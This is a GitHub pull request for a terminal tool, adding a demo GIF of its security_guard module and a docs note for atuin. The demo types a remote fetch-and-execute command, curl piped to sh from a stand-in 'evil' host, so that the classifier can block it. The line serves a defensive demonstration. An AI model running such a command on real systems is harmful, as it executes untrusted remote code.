Skip to content

feat(demo): security_guard subset GIF plus atuin docs note#545

Merged
fentas merged 2 commits into
masterfrom
feat-demo-security-guard
Jun 30, 2026
Merged

feat(demo): security_guard subset GIF plus atuin docs note#545
fentas merged 2 commits into
masterfrom
feat-demo-security-guard

Conversation

@fentas

@fentas fentas commented Jun 30, 2026

Copy link
Copy Markdown
Owner

The last of the per-feature subset GIFs.

security_guard (new GIF)

tests/demo/security_guard/ — typing curl https://get.evil.sh | sh and pressing Enter triggers the in-proc Tier-1 classifier (no atty-guard daemon — daemon_socket_path is empty, so the bundled patterns run in-process). atty arms the banner:

atty security_guard: remote-fetch-and-execute (`curl … | sh`)
        match: curl https://get.evil.sh | sh
        [y]es once · [a]llow always · [t]rust permanently · [B]lock host forever · any other key cancels.

Frame-verified, footer visible, OSC 7 stripped. Embedded on docs/modules/security_guard.md.

atuin (deferred recording, docs note)

The atuin ghost-text UX is identical to the shipped shell-native history GIF — same dim suggestion + accept, just sourced from the Atuin DB. A dedicated atuin recording needs a seeded database (fiddly + flaky in the static pipeline), so docs/modules/atuin.md embeds the existing ghost GIF with a note rather than a separate, brittle recording.

Still deferred

Not in CI — tests/demo runs only via zig build demo / make demo-gifs.

🤖 Generated with Claude Code

…t demo

- tests/demo/security_guard/ — the in-proc Tier-1 classifier catches a
  `curl … | sh` remote-fetch-and-execute and arms the [y]/[a]/[t]/[B] banner
  before it runs, with NO atty-guard daemon (empty daemon_socket_path → the
  bundled pattern set runs in-process). docs/assets/atty-security-guard.gif on
  the module page. Frame-verified; footer visible; OSC 7 stripped.
- docs/modules/atuin.md: embed the shipped ghost GIF with a note that atuin's
  ghost-text UX is identical (same suggestions from the Atuin DB) — a dedicated
  atuin recording needs a seeded database, tracked as a follow-up.

Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>

Copilot AI left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Pull request overview

Adds the final per-feature demo recording for the security_guard module and wires it into the docs, plus updates atuin docs to reuse the existing ghost-text GIF with an explanation instead of introducing a flaky Atuin-seeded recording.

Changes:

  • Add a new tests/demo/security_guard/ e2e scenario + golden recording artifacts to generate atty-security-guard.gif.
  • Embed the new security_guard GIF in docs/modules/security_guard.md.
  • Embed the existing ghost-text GIF in docs/modules/atuin.md with a note explaining why it’s reused.

Reviewed changes

Copilot reviewed 5 out of 7 changed files in this pull request and generated 1 comment.

Show a summary per file
File Description
tests/demo/security_guard/scenario.e2e New scripted demo scenario for the security_guard banner flow.
tests/demo/security_guard/golden/env.toml Recorded demo environment metadata for reproducible casting.
tests/demo/security_guard/golden/cast.json Golden asciinema cast backing the generated security_guard GIF.
tests/demo/security_guard/config.zig Demo config enabling security_guard and status bar for recording.
docs/modules/security_guard.md Embeds the new atty-security-guard.gif in module docs.
docs/modules/atuin.md Reuses atty-ghost.gif and documents why a dedicated Atuin recording is deferred.
Files not reviewed (1)
  • tests/demo/security_guard/golden/cast.json: Generated file

💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.

Comment thread tests/demo/security_guard/config.zig Outdated
- security_guard config: set daemon_socket_path = "" explicitly (Copilot) so the
  in-proc Tier-1 intent is clear + robust to a default change. Same value as the
  default → behaviour + recorded cast unchanged.
- atuin.md: link the deferred-atuin-recording follow-up (#546).

Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
@fentas fentas merged commit 59c7593 into master Jun 30, 2026
6 checks passed
@fentas fentas deleted the feat-demo-security-guard branch June 30, 2026 18:18
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants